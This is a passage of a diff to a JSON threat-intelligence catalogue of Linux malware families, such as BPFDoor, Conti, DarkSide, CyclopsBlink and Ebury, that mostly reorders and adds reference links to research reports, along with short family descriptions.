"https://twitter.com/CraigHRowland/status/1523266585133457408", - "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor", + "https://www.bleepingcomputer.com/news/security/stealthier-version-of-linux-bpfdoor-malware-spotted-in-the-wild/", "https://elastic.github.io/security-research/intelligence/2022/05/04.bpfdoor/article/#", - "https://troopers.de/troopers22/talks/7cv8pz/" + "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game", + "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf", + "https://twitter.com/cyb3rops/status/1523227511551033349", + "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf", + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://nikhilh-20.github.io/blog/cbpf_bpfdoor/" ], "synonyms": [ "JustForFun" @@ -3898,12 +4054,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bvp47", - "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf", - "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf", - "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group_ii.en.pdf", - "https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/", "https://www.bleepingcomputer.com/news/security/nsa-linked-bvp47-linux-backdoor-widely-undetected-for-10-years/", - "https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html" + "https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/", + "https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html", + "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group_ii.en.pdf", + "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf", + "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf" ], "synonyms": [], "type": [] @@ -3955,10 +4111,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked", - "https://blogs.cisco.com/security/linuxcdorked-faqs", "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html", - "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", "https://www.symantec.com/security-center/writeup/2013-050214-5501-99", + "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", + "https://blogs.cisco.com/security/linuxcdorked-faqs", "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/" ], "synonyms": [ @@ -4013,8 +4169,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chaos", - "https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html", - "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/" + "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/", + "https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html" ], "synonyms": [], "type": [] @@ -4054,8 +4210,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.clop", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", "https://www.helpnetsecurity.com/2023/02/07/cl0p-ransomware-decryptor-linux/", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", "https://www.sentinelone.com/labs/cl0p-ransomware-targets-linux-systems-with-flawed-encryption-decryptor-available/" ], "synonyms": [ @@ -4073,9 +4230,9 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf", "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf", - "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [ "Snoopy" @@ -4085,24 +4242,40 @@ "uuid": "0b1c514d-f617-4380-a28c-a1ed305a7538", "value": "Cloud Snooper" }, + { + "description": "ConnectBack malware is a type of malicious software designed to establish unauthorized connections from an infected system to a remote server. Once a victim's device is compromised, ConnectBack creates a covert channel for communication, allowing the attacker to remotely control and gather sensitive information from the compromised system.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.connectback", + "https://labs.sucuri.net/signatures/malwares/pl-backdoor-connectback-001/" + ], + "synonyms": [ + "Getshell" + ], + "type": [] + }, + "uuid": "82c57d1b-c11b-44f7-9675-2f0d23fb543f", + "value": "ConnectBack" + }, { "description": "Ransomware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.conti", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware", "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", - "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf", - "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html", - "https://www.youtube.com/watch?v=cYx7sQRbjGA", - "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://securelist.com/new-ransomware-trends-in-2022/106457/", - "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again", + "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf", "https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself" + "https://securelist.com/new-ransomware-trends-in-2022/106457/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html", + "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", + "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru", + "https://www.youtube.com/watch?v=cYx7sQRbjGA" ], "synonyms": [ "Conti Locker" @@ -4112,26 +4285,13 @@ "uuid": "c1ab8323-ce61-409a-80f3-b945c8ffcd42", "value": "Conti (ELF)" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.corona", - "https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "591b15c3-ab72-49ce-981a-e6e21e506e52", - "value": "Corona DDOS Bot" - }, { "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", - "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/", - "https://github.com/pooler/cpuminer" + "https://github.com/pooler/cpuminer", + "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/" ], "synonyms": [], "type": [] @@ -4144,9 +4304,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r", - "https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html", + "https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/", "https://resolverblog.blogspot.com/2019/02/d-link-dns-320-nas-cr1ptt0r-ransomware.html", - "https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/" + "https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html" ], "synonyms": [ "CriptTor" @@ -4174,21 +4334,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cyclops_blink", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a", - "https://www.justice.gov/opa/video/attorney-general-merrick-b-garland-announces-enforcement-actions-disrupt-and-prosecute", - "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation", - "https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py", - "https://www.shadowserver.org/news/shadowserver-special-reports-cyclops-blink/", - "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html", - "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", "https://www.bleepingcomputer.com/news/security/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers/", - "https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/", + "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation", + "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyclops-blink-sets-sights-on-asus-routers/Appendix_Cyclops%20Blink%20Sets%20Sights%20on%20ASUS%20Routers.pdf", - "https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/", - "https://www.justice.gov/opa/press-release/file/1491281/download", - "https://www.theregister.com/2022/03/18/cyclops_asus_routers/", + "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a", "https://attack.mitre.org/groups/G0034", - "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html" + "https://www.theregister.com/2022/03/18/cyclops_asus_routers/", + "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html", + "https://www.justice.gov/opa/video/attorney-general-merrick-b-garland-announces-enforcement-actions-disrupt-and-prosecute", + "https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py", + "https://www.justice.gov/opa/press-release/file/1491281/download", + "https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/", + "https://www.shadowserver.org/news/shadowserver-special-reports-cyclops-blink/", + "https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/" ], "synonyms": [], "type": [] @@ -4197,19 +4357,20 @@ "value": "CyclopsBlink" }, { - "description": "", + "description": "According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.\r\n\r\nResearch shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://blog.netlab.360.com/dacls-the-dual-platform-rat/", - "https://www.sygnia.co/mata-framework", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", - "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", - "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" + "https://www.sygnia.co/mata-framework", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://vblocalhost.com/uploads/VB2021-Park.pdf", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [], "type": [] @@ -4222,11 +4383,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark", - "https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities", - "https://twitter.com/ESETresearch/status/1440052837820428298?s=20", - "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx", "https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx", - "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/" + "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx", + "https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities", + "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/", + "https://twitter.com/ESETresearch/status/1440052837820428298?s=20" ], "synonyms": [ "Dark.IoT" @@ -4241,8 +4402,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.darknexus", - "https://www.stratosphereips.org/blog/2020/6/8/dark-nexus-the-old-the-new-and-the-ugly", - "https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html" + "https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html", + "https://www.stratosphereips.org/blog/2020/6/8/dark-nexus-the-old-the-new-and-the-ugly" ], "synonyms": [], "type": [] @@ -4255,59 +4416,59 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.darkside", - "https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/", - "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/", - "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime", - "https://www.youtube.com/watch?v=qxPXxWMI2i4", - "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", - "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside", - "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/", - "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", - "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin", - "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/", "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/", - "https://pylos.co/2021/05/13/mind-the-air-gap/", - "https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/", - "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted", - "https://twitter.com/GelosSnake/status/1451465959894667275", - "https://blog.group-ib.com/blackmatter#", - "https://www.ic3.gov/Media/News/2021/211101.pdf", - "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/", - "https://twitter.com/JAMESWT_MHT/status/1388301138437578757", "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/", - "https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version", - "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", - "https://blog.group-ib.com/blackmatter2", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", - "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access", - "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/", - "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims", - "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/", - "https://www.youtube.com/watch?v=NIiEcOryLpI", - "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636", + "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/", + "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/", + "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group", "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/", - "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/", + "https://www.ic3.gov/Media/News/2021/211101.pdf", + "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", + "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/", + "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/", + "https://twitter.com/GelosSnake/status/1451465959894667275", + "https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version", + "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b", + "https://twitter.com/JAMESWT_MHT/status/1388301138437578757", + "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims", + "https://www.youtube.com/watch?v=qxPXxWMI2i4", + "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access", + "https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", + "https://blog.group-ib.com/blackmatter#", + "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636", + "https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/", + "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime", + "https://blog.group-ib.com/blackmatter2", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin", + "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/", - "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group" + "https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", + "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/", + "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html", + "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/", + "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted", + "https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", + "https://pylos.co/2021/05/13/mind-the-air-gap/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", + "https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html", + "https://www.youtube.com/watch?v=NIiEcOryLpI", + "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/" ], "synonyms": [], "type": [] @@ -4333,11 +4494,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddg", - "https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/", + "https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/", "https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/", "https://blog.netlab.360.com/ddg-botnet-round-x-is-there-an-ending/", "https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/", - "https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/" + "https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/" ], "synonyms": [], "type": [] @@ -4364,9 +4525,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.deadbolt", "https://community.riskiq.com/article/1601124b", - "https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html", "https://securelist.com/new-ransomware-trends-in-2022/106457/", - "https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/" + "https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/", + "https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html" ], "synonyms": [], "type": [] @@ -4379,8 +4540,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.denonia", - "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/", - "https://thehackernews.com/2022/04/first-malware-targeting-aws-lambda.html" + "https://thehackernews.com/2022/04/first-malware-targeting-aws-lambda.html", + "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/" ], "synonyms": [], "type": [] @@ -4393,9 +4554,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.derusbi", + "https://twitter.com/IntezerLabs/status/1407676522534735873?s=20", "https://attack.mitre.org/groups/G0001/", - "https://attack.mitre.org/groups/G0096", - "https://twitter.com/IntezerLabs/status/1407676522534735873?s=20" + "https://attack.mitre.org/groups/G0096" ], "synonyms": [], "type": [] @@ -4407,10 +4568,7 @@ "description": "Dofloo (aka AESDDoS) is a popular malware used to create large scale botnets that can launch DDoS attacks and load cryptocurrency miners to the infected machines. ", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dofloo", - "https://blog.syscall.party/post/aes-ddos-analysis-part-1/", - "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf", - "https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/" + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dofloo" ], "synonyms": [ "AESDDoS" @@ -4426,8 +4584,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/", - "https://www.securecoding.com/blog/all-about-doki-malware/" + "https://www.securecoding.com/blog/all-about-doki-malware/", + "https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/" ], "synonyms": [], "type": [] @@ -4449,20 +4607,33 @@ "uuid": "a41d8c89-8229-4936-96c2-4b194ebaf858", "value": "DoubleFantasy (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dreambus", + "https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability" + ], + "synonyms": [], + "type": [] + }, + "uuid": "22ff8eac-d92e-4c6e-829b-9b565d90eddd", + "value": "DreamBus" + }, { "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", - "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", - "https://csirt.gov.it/data/cms/posts/582/attachments/66ca2e9a-68cd-4df5-81a2-674c31a699c2/download", - "https://security.web.cern.ch/security/advisories/windigo/windigo.shtml", - "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", - "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/", - "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", - "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", "https://www.welivesecurity.com/2014/10/15/operation-windigo-good-job-eset-says-malware-author/", - "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf" + 